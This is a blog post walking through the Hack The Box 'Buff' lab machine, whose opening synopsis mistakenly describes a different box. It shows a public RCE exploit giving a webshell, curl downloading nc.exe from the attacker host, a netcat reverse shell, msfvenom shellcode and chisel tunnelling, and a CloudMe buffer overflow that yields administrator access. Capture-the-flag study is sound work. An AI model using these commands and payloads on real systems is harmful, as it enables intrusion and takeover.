DEV Community

ikkyu
ikkyu

Posted on

【Hack the Box】Buff - Walkthrough

From the HackTheBox
Screenshot from 2021-01-14 19-23-53

SYNOPSISGrandpa is one of the simpler machines on Hack The Box, however it covers the widely-exploitedCVE-2017-7269. This vulnerability is trivial to exploit and granted immediate access to thousandsof IIS servers around the globe when it became public knowledge.

Enumeration

# Nmap 7.80 scan initiated Fri Sep 25 20:44:58 2020 as: nmap -sV -sC -Pn -oA nmap --script vuln 10.10.10.198
Nmap scan report for 10.10.10.198
Host is up (0.34s latency).
Not shown: 999 filtered ports
PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.10.10.198
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://10.10.10.198:8080/
|     Form id: 
|     Form action: include/process_login.php
|     
|     Path: http://10.10.10.198:8080/facilities.php
|     Form id: 
|     Form action: include/process_login.php
|     
|     Path: http://10.10.10.198:8080/packages.php
|     Form id: 
|     Form action: include/process_login.php
|     
|     Path: http://10.10.10.198:8080/about.php
|     Form id: 
|     Form action: include/process_login.php
|     
|     Path: http://10.10.10.198:8080/contact.php
|     Form id: 
|     Form action: include/process_login.php
|     
|     Path: http://10.10.10.198:8080/index.php
|     Form id: 
|_    Form action: include/process_login.php
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|_  /icons/: Potentially interesting folder w/ directory listing
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_      http://ha.ckers.org/slowloris/
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-trace: TRACE is enabled
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| vulners: 
|   cpe:/a:apache:http_server:2.4.43: 
|       CVE-2010-0425   10.0    https://vulners.com/cve/CVE-2010-0425
|       CVE-1999-1412   10.0    https://vulners.com/cve/CVE-1999-1412
|       CVE-1999-1237   10.0    https://vulners.com/cve/CVE-1999-1237
|       CVE-1999-0236   10.0    https://vulners.com/cve/CVE-1999-0236
|       CVE-2009-1955   7.8 https://vulners.com/cve/CVE-2009-1955
|       CVE-2007-6423   7.8 https://vulners.com/cve/CVE-2007-6423
|       CVE-2007-0086   7.8 https://vulners.com/cve/CVE-2007-0086
|       CVE-2020-11984  7.5 https://vulners.com/cve/CVE-2020-11984
|       CVE-2009-3095   7.5 https://vulners.com/cve/CVE-2009-3095
|       CVE-2007-4723   7.5 https://vulners.com/cve/CVE-2007-4723
|       CVE-2009-1891   7.1 https://vulners.com/cve/CVE-2009-1891
|       CVE-2009-1890   7.1 https://vulners.com/cve/CVE-2009-1890
|       CVE-2008-2579   6.8 https://vulners.com/cve/CVE-2008-2579
|       CVE-2007-5156   6.8 https://vulners.com/cve/CVE-2007-5156
|       CVE-2020-9490   5.0 https://vulners.com/cve/CVE-2020-9490
|       CVE-2014-0231   5.0 https://vulners.com/cve/CVE-2014-0231
|       CVE-2011-1752   5.0 https://vulners.com/cve/CVE-2011-1752
|       CVE-2010-1452   5.0 https://vulners.com/cve/CVE-2010-1452
|       CVE-2010-0408   5.0 https://vulners.com/cve/CVE-2010-0408
|       CVE-2009-2699   5.0 https://vulners.com/cve/CVE-2009-2699
|       CVE-2007-0450   5.0 https://vulners.com/cve/CVE-2007-0450
|       CVE-2005-1268   5.0 https://vulners.com/cve/CVE-2005-1268
|       CVE-2003-0020   5.0 https://vulners.com/cve/CVE-2003-0020
|       CVE-2001-1556   5.0 https://vulners.com/cve/CVE-2001-1556
|       CVE-1999-0678   5.0 https://vulners.com/cve/CVE-1999-0678
|       CVE-1999-0289   5.0 https://vulners.com/cve/CVE-1999-0289
|       CVE-1999-0070   5.0 https://vulners.com/cve/CVE-1999-0070
|       CVE-2009-1195   4.9 https://vulners.com/cve/CVE-2009-1195
|       CVE-2020-11993  4.3 https://vulners.com/cve/CVE-2020-11993
|       CVE-2011-1783   4.3 https://vulners.com/cve/CVE-2011-1783
|       CVE-2010-0434   4.3 https://vulners.com/cve/CVE-2010-0434
|       CVE-2008-2939   4.3 https://vulners.com/cve/CVE-2008-2939
|       CVE-2008-2168   4.3 https://vulners.com/cve/CVE-2008-2168
|       CVE-2008-0455   4.3 https://vulners.com/cve/CVE-2008-0455
|       CVE-2007-6420   4.3 https://vulners.com/cve/CVE-2007-6420
|       CVE-2007-6388   4.3 https://vulners.com/cve/CVE-2007-6388
|       CVE-2007-5000   4.3 https://vulners.com/cve/CVE-2007-5000
|       CVE-2007-4465   4.3 https://vulners.com/cve/CVE-2007-4465
|       CVE-2007-1349   4.3 https://vulners.com/cve/CVE-2007-1349
|       CVE-2007-6422   4.0 https://vulners.com/cve/CVE-2007-6422
|       CVE-2007-6421   3.5 https://vulners.com/cve/CVE-2007-6421
|_      CVE-2001-0131   1.2 https://vulners.com/cve/CVE-2001-0131

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Sep 25 20:51:08 2020 -- 1 IP address (1 host up) scanned in 370.35 seconds
Enter fullscreen mode Exit fullscreen mode

I found port 8080 is open.

Screenshot from 2021-01-07 17-48-39

Local Privilege Escalation

I searched gym in metasploit and found 48506.py.

$ searchsploit gym
[i] Found (#1): /home/ikkyu/exploitdb/files_exploits.csv
[i] To remove this message, please edit "/home/ikkyu/exploitdb/.searchsploit_rc" for "files_exploits.csv" (package_array: exploitdb)

[i] Found (#1): /home/ikkyu/exploitdb/files_shellcodes.csv
[i] To remove this message, please edit "/home/ikkyu/exploitdb/.searchsploit_rc" for "files_shellcodes.csv" (package_array: exploitdb)

-------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                        |  Path
-------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Gym Management System 1.0 - Unauthenticated Remote Code Execution                                                                     | php/webapps/48506.py
WordPress Plugin WPGYM - SQL Injection                                                                                                | php/webapps/42801.txt
------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Enter fullscreen mode Exit fullscreen mode

I run this.

$ python ~/exploitdb/exploits/php/webapps/48506.py http://10.10.10.198:8080/

            /\
/vvvvvvvvvvvv \--------------------------------------,
`^^^^^^^^^^^^ /============BOKU====================="
            \/

[+] Successfully connected to webshell.
C:\xampp\htdocs\gym\upload> 
Enter fullscreen mode Exit fullscreen mode
C:\xampp\htdocs\gym\upload> whoami
�PNG
�
buff\shaun
Enter fullscreen mode Exit fullscreen mode

Now I got the machine. Next we neet to upload nc.exe to upgrade shell.

At local machine:

$ python -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
Enter fullscreen mode Exit fullscreen mode

At target machine:

C:\xampp\htdocs\gym\upload> curl http://10.10.14.6:8000/nc.exe -o nc.exe
�PNG
�
Enter fullscreen mode Exit fullscreen mode
C:\xampp\htdocs\gym\upload> dir
�PNG
�
 Volume in drive C has no label.
 Volume Serial Number is A22D-49F7

 Directory of C:\xampp\htdocs\gym\upload

22/12/2020  12:04    <DIR>          .
22/12/2020  12:04    <DIR>          ..
22/12/2020  12:04                53 kamehameha.php
22/12/2020  11:40            38,616 nc.exe
               2 File(s)         38,669 bytes
               2 Dir(s)   7,315,296,256 bytes free
Enter fullscreen mode Exit fullscreen mode

I succeeded in uploading.
Now we can get a reverse shell.

At local machine:

rlwrap nc -lvnp 4444
Listening on 0.0.0.0 4444
Enter fullscreen mode Exit fullscreen mode

At target machine:

C:\xampp\htdocs\gym\upload> nc.exe 10.10.14.6 4444 -e cmd.exe
Enter fullscreen mode Exit fullscreen mode

At local machine:

rlwrap nc -lvnp 4444
Listening on 0.0.0.0 4444
Connection received on 10.10.10.198 49682
Microsoft Windows [Version 10.0.17134.1610]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\xampp\htdocs\gym\upload>
Enter fullscreen mode Exit fullscreen mode

I got a reverse shell.

Administrator Privilege Escalation

I checked process.

C:\xampp\htdocs\gym\upload>tasklist
tasklist

Image Name                     PID Session Name        Session#    Mem Usage
========================= ======== ================ =========== ============
System Idle Process              0                            0          8 K
System                           4                            0         44 K
Registry                       104                            0      7,392 K
smss.exe                       368                            0        384 K
csrss.exe                      456                            0      3,856 K
wininit.exe                    532                            0      4,608 K
csrss.exe                      540                            1      3,452 K
winlogon.exe                   604                            1      8,888 K
services.exe                   676                            0      8,296 K
lsass.exe                      696                            0     12,072 K
svchost.exe                    812                            0      2,520 K
fontdrvhost.exe                836                            0     13,900 K
fontdrvhost.exe                844                            1      8,100 K
svchost.exe                    860                            0     22,724 K
svchost.exe                    956                            0     12,036 K
svchost.exe                   1004                            0      6,028 K
dwm.exe                        328                            1     41,676 K
svchost.exe                    360                            0      8,292 K
svchost.exe                    948                            0      7,100 K
svchost.exe                    996                            0      9,664 K
svchost.exe                   1076                            0     18,084 K
svchost.exe                   1136                            0     18,504 K
svchost.exe                   1208                            0      5,984 K
svchost.exe                   1280                            0      5,680 K
svchost.exe                   1380                            0      8,672 K
svchost.exe                   1388                            0     10,612 K
svchost.exe                   1408                            0      4,044 K
svchost.exe                   1416                            0      7,352 K
svchost.exe                   1516                            0      9,604 K
svchost.exe                   1552                            0     12,944 K
Memory Compression            1564                            0     30,132 K
svchost.exe                   1592                            0      7,004 K
svchost.exe                   1676                            0      6,028 K
svchost.exe                   1772                            0      5,036 K
svchost.exe                   1780                            0      5,792 K
svchost.exe                   1824                            0      6,956 K
svchost.exe                   1880                            0      8,588 K
svchost.exe                   1988                            0      6,180 K
svchost.exe                   1456                            0      6,364 K
svchost.exe                   1336                            0      7,044 K
svchost.exe                   1240                            0      4,432 K
svchost.exe                   2060                            0      7,564 K
svchost.exe                   2132                            0      9,108 K
svchost.exe                   2284                            0      5,600 K
spoolsv.exe                   2300                            0     12,040 K
svchost.exe                   2424                            0      6,124 K
svchost.exe                   2736                            0      7,660 K
svchost.exe                   2748                            0     14,036 K
svchost.exe                   2760                            0     19,308 K
svchost.exe                   2768                            0      3,696 K
svchost.exe                   2756                            0      4,532 K
vmtoolsd.exe                  2788                            0     18,696 K
svchost.exe                   2796                            0     13,656 K
svchost.exe                   2804                            0     15,532 K
SecurityHealthService.exe     2832                            0     13,048 K
MsMpEng.exe                   2864                            0    169,640 K
VGAuthService.exe             2880                            0      7,840 K
svchost.exe                   2980                            0      7,080 K
svchost.exe                   2052                            0      9,868 K
svchost.exe                   3104                            0      9,768 K
svchost.exe                   3144                            0      3,568 K
dllhost.exe                   3660                            0     11,308 K
WmiPrvSE.exe                  3848                            0     14,188 K
msdtc.exe                     2720                            0      8,132 K
svchost.exe                   4540                            0     30,464 K
sihost.exe                    4596                            1     21,576 K
svchost.exe                   4620                            1     11,716 K
svchost.exe                   4672                            1     24,212 K
taskhostw.exe                 4768                            1      9,896 K
svchost.exe                   4932                            0      5,548 K
ctfmon.exe                    4992                            1     10,796 K
svchost.exe                   5080                            0      5,848 K
svchost.exe                   5092                            0     11,500 K
NisSrv.exe                    5212                            0      7,268 K
WmiPrvSE.exe                  5276                            0     18,888 K
explorer.exe                  5716                            1     79,172 K
svchost.exe                   5776                            0     16,212 K
svchost.exe                   5796                            0     11,372 K
svchost.exe                   5960                            0      5,312 K
svchost.exe                   6000                            0     12,380 K
svchost.exe                   5444                            0      4,852 K
svchost.exe                   4416                            0      4,976 K
ShellExperienceHost.exe       1048                            1     51,772 K
SearchUI.exe                  6360                            1    118,800 K
RuntimeBroker.exe             6588                            1     16,452 K
ApplicationFrameHost.exe      6780                            1     26,996 K
MicrosoftEdge.exe             7072                            1     55,284 K
browser_broker.exe            7160                            1      6,876 K
svchost.exe                   6316                            0      4,668 K
Windows.WARP.JITService.e     4404                            0      3,380 K
RuntimeBroker.exe             4356                            1      5,012 K
MicrosoftEdgeCP.exe           4220                            1     18,920 K
RuntimeBroker.exe             4464                            1     13,908 K
MicrosoftEdgeCP.exe           2672                            1     21,300 K
svchost.exe                   7332                            0     11,264 K
conhost.exe                   7464                            0      1,008 K
SearchIndexer.exe             8140                            0     23,680 K
MSASCuiL.exe                  7424                            1      6,812 K
vmtoolsd.exe                  5748                            1     13,220 K
httpd.exe                     1712                            0        460 K
mysqld.exe                    7716                            0      3,480 K
svchost.exe                   2572                            0      3,636 K
svchost.exe                   5304                            1     14,224 K
httpd.exe                     1460                            0      9,188 K
svchost.exe                   6552                            0     12,824 K
SgrmBroker.exe                2296                            0      2,704 K
svchost.exe                   8248                            0      6,984 K
CompatTelRunner.exe           1104                            0        632 K
conhost.exe                   8608                            0      1,216 K
svchost.exe                   7788                            0      8,192 K
Microsoft.Photos.exe          2528                            1      5,240 K
RuntimeBroker.exe             3856                            1     12,252 K
WinStore.App.exe              8424                            1     26,440 K
RuntimeBroker.exe             4556                            1      5,240 K
SystemSettings.exe            7764                            1     32,228 K
svchost.exe                   5984                            0      4,748 K
svchost.exe                   7484                            0      9,652 K
taskhostw.exe                 5920                            1     20,872 K
taskhostw.exe                 3520                            0     23,440 K
CompatTelRunner.exe           1548                            0      2,428 K
conhost.exe                   8792                            0      9,736 K
TrustedInstaller.exe          1016                            0      5,524 K
svchost.exe                    196                            0      5,352 K
TiWorker.exe                  2148                            0    103,996 K
svchost.exe                   8784                            0      7,844 K
svchost.exe                   6488                            0      3,792 K
svchost.exe                   8596                            0     11,860 K
cmd.exe                       7204                            0      2,432 K
conhost.exe                   9176                            0      9,132 K
nc.exe                        7192                            0      5,436 K
cmd.exe                       4504                            0      3,988 K
cmd.exe                        708                            0      3,208 K
conhost.exe                   2452                            0     10,868 K
CloudMe.exe                   3496                            0     26,884 K
timeout.exe                   5968                            0      3,920 K
tasklist.exe                  8796                            0      7,772 K
Enter fullscreen mode Exit fullscreen mode

I found CloudMe.exe. CloudMe is known to be vulnerable. I searched cloudme in metasploit.

$ searchsploit cloudme

--------------------------------------------------- ---------------------------------
 Exploit Title                                |  Path
--------------------------------------------------- ---------------------------------
CloudMe 1.11.2 - Buffer Overflow (PoC)        | windows/remote/48389.py
CloudMe 1.11.2 - Buffer Overflow (SEH_DEP_ASL | win
ws/local/48499.txt
CloudMe 1.11.2 - Buffer Overflow ROP (DEP_ASL | windows/local/48840.py
Cloudme 1.9 - Buffer Overflow (DEP) (Metasplo | windows_x86-64/remote/45197.rb
CloudMe Sync 1.10.9 - Buffer Overflow (SEH)(D | windows_x86-64/local/45159.py
CloudMe Sync 1.10.9 - Stack-Based Buffer Over | windows/remote/44175.rb
CloudMe Sync 1.11.0 - Local Buffer Overflow   | windows/local/44470.py
CloudMe Sync 1.11.2 - Buffer Overflow + Egghu | windows/remote/46218.py
CloudMe Sync 1.11.2 Buffer Overflow - WoW64 ( | windows_x86-64/remote/46250.py
CloudMe Sync < 1.11.0 - Buffer Overflow       | windows/remote/44027.py
CloudMe Sync < 1.11.0 - Buffer Overflow (SEH) | windows_x86-64/remote/44784.py
--------------------------------------------------- ---------------------------------
Shellcodes: No Results
Enter fullscreen mode Exit fullscreen mode

I found 48389.py. I searched about this on exploit-db.

Screenshot from 2021-01-14 21-13-46

Now we need to modify this code a bit and remote port forwarding on the target machine.You can see from the exploit-db that the default is to launch the calculator.

I created payload. Here, the port is set to 4445, but it can be anything.

$ msfvenom -a x86 -p windows/exec CMD='C:\xampp\htdocs\gym\upload\nc.exe 10.10.14.28 4445 -e cmd.exe' -b '\x00\x0A\x0D' -f python -v payload
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 273 (iteration=0)
x86/shikata_ga_nai chosen with final size 273
Payload size: 273 bytes
Final size of python file: 1452 bytes
payload =  b""
payload += b"\xda\xcf\xd9\x74\x24\xf4\xbe\xe3\xce\xa2\x54\x5a"
payload += b"\x29\xc9\xb1\x3e\x31\x72\x19\x83\xea\xfc\x03\x72"
payload += b"\x15\x01\x3b\x5e\xbc\x47\xc4\x9f\x3d\x27\x4c\x7a"
payload += b"\x0c\x67\x2a\x0e\x3f\x57\x38\x42\xcc\x1c\x6c\x77"
payload += b"\x47\x50\xb9\x78\xe0\xde\x9f\xb7\xf1\x72\xe3\xd6"
payload += b"\x71\x88\x30\x39\x4b\x43\x45\x38\x8c\xb9\xa4\x68"
payload += b"\x45\xb6\x1b\x9d\xe2\x82\xa7\x16\xb8\x03\xa0\xcb"
payload += b"\x09\x22\x81\x5d\x01\x7d\x01\x5f\xc6\xf6\x08\x47"
payload += b"\x0b\x32\xc2\xfc\xff\xc9\xd5\xd4\x31\x32\x79\x19"
payload += b"\xfe\xc1\x83\x5d\x39\x39\xf6\x97\x39\xc4\x01\x6c"
payload += b"\x43\x12\x87\x77\xe3\xd1\x3f\x5c\x15\x36\xd9\x17"
payload += b"\x19\xf3\xad\x70\x3e\x02\x61\x0b\x3a\x8f\x84\xdc"
payload += b"\xca\xcb\xa2\xf8\x97\x88\xcb\x59\x72\x7f\xf3\xba"
payload += b"\xdd\x20\x51\xb0\xf0\x35\xe8\x9b\x9e\xc8\x7e\xa6"
payload += b"\xed\xca\x80\xa9\x41\xa2\xb1\x22\x0e\xb5\x4d\xe1"
payload += b"\x6a\x49\x04\xa8\xdb\xc1\xc1\x38\x5e\x8c\xf1\x96"
payload += b"\x9d\xa8\x71\x13\x5e\x4f\x69\x56\x5b\x14\x2d\x8a"
payload += b"\x11\x05\xd8\xac\x86\x26\xc9\xee\x12\x84\x8a\x91"
payload += b"\x0f\x44\x1b\x0e\xb8\xd0\xbf\xc1\x5b\x6b\x1c\x79"
payload += b"\xe5\xe6\xc0\xf0\x65\x94\x97\x9b\xe1\x38\x06\x3f"
payload += b"\xc4\xa5\xae\xda\x38\x14\x7f\x0b\x08\x66\x51\x62"
payload += b"\x5e\xa8\x9f\xbc\xbe\x80\xeb\x88\x8b\xc8\x3e\x94"
payload += b"\xd3\x6b\x2c\x32\x3a\x0e\xd6\xdf\x42"
Enter fullscreen mode Exit fullscreen mode

Replace the payload part of 48389.py.
Next, we need to upload chisel.exe to remote port forwarding as before. After uploading,at local machine:

$ chisel server -p 1234 -reverse -v
2021/01/07 17:33:38 server: Reverse tunnelling enabled
2021/01/07 17:33:38 server: Fingerprint Wf5cpZzaVbfNXiWNsUT8AEcLYgEeOI7r3U440nagv08=
2021/01/07 17:33:38 server: Listening on http://0.0.0.0:1234
Enter fullscreen mode Exit fullscreen mode

At target machine:

C:\xampp\htdocs\gym\upload>chisel.exe client -v 10.10.14.28:1234 R:8888:127.0.0.1:8888 --keepalive:1000
chisel.exe client -v 10.10.14.28:1234 R:8888:127.0.0.1:8888 --keepalive:1000
2021/01/07 07:31:30 client: Connecting to ws://10.10.14.28:1234
2021/01/07 07:31:30 client: tun: proxy#1000=>--keepalive:1000: Listening
2021/01/07 07:31:30 client: tun: Bound proxies
2021/01/07 07:31:31 client: Handshaking...
2021/01/07 07:31:33 client: Sending config
2021/01/07 07:31:33 client: Connected (Latency 336.4421ms)
2021/01/07 07:31:33 client: tun: SSH connected
Enter fullscreen mode Exit fullscreen mode

Now start a netcat listener on 4445 and execute the pyload on the second terminal.

$ nc -lnvp 4445
Listening on 0.0.0.0 4445

Connection received on 10.10.10.198 49686
Microsoft Windows [Version 10.0.17134.1610]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
buff\administrator
Enter fullscreen mode Exit fullscreen mode

We got the admin.

Discussion (1)

Collapse
marcellothearcane profile image
marcellothearcane

Ouch! How do you mitigate?